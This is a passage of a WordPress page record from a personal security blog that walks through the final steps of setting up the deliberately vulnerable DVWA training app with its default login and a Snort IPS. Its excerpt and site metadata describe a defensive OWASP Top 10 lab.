After it creates the database, it\u2019ll redirect you to the main login page.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"688\" height=\"507\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/mainlogin.png\" alt=\"\" class=\"wp-image-1024\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/mainlogin.png 688w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/mainlogin-300x221.png 300w\" sizes=\"(max-width: 688px) 100vw, 688px\" \/><\/figure>\n\n\n\n<p>You can log in with Admin\/Password.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"924\" height=\"636\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAInside.png\" alt=\"\" class=\"wp-image-1025\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAInside.png 924w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAInside-300x206.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/DVWAInside-768x529.png 768w\" sizes=\"(max-width: 924px) 100vw, 924px\" \/><\/figure>\n\n\n\n<p>And that\u2019s it, analysts\/operators\/intruders, happy hacking.<\/p>\n\n\n\n<p>Note: If you want Snort, you can run \u201csudo apt install snort\u201d on the Ubuntu box. Then cd into \/etc\/snort\/rules and open \u201clocal.rules\u201d with vi\/vim.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Snort Rules Basic Snort Rule format DVWA Download You can follow along with how I did it or look at the official GitHub and see what other possibilities\/changes you can make to DVWA. https:\/\/github.com\/digininja\/DVWA Lab Brief Summary Configured the DVWA webserver with Snort IPS to demonstrate OWASP Top 10. Will bring up easily understandable vulnerabilities and their respective mitigation strategies, correlated with each category. 
I have also developed tailored Snort rules for the applicable vulnerabilities. Additional Helpful Links Snort 3 Rules Manual Snort 2 Rules Manual PCRE (Regex) Manual HTML URL Encoding Reference OWASP Top 10 This lab was originally<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"class_list":["post-832","page","type-page","status-publish","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/832","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=832"}],"version-history":[{"count":77,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/832\/revisions"}],"predecessor-version":[{"id":1147,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/832\/revisions\/1147"}],"wp:attachment":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=832"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}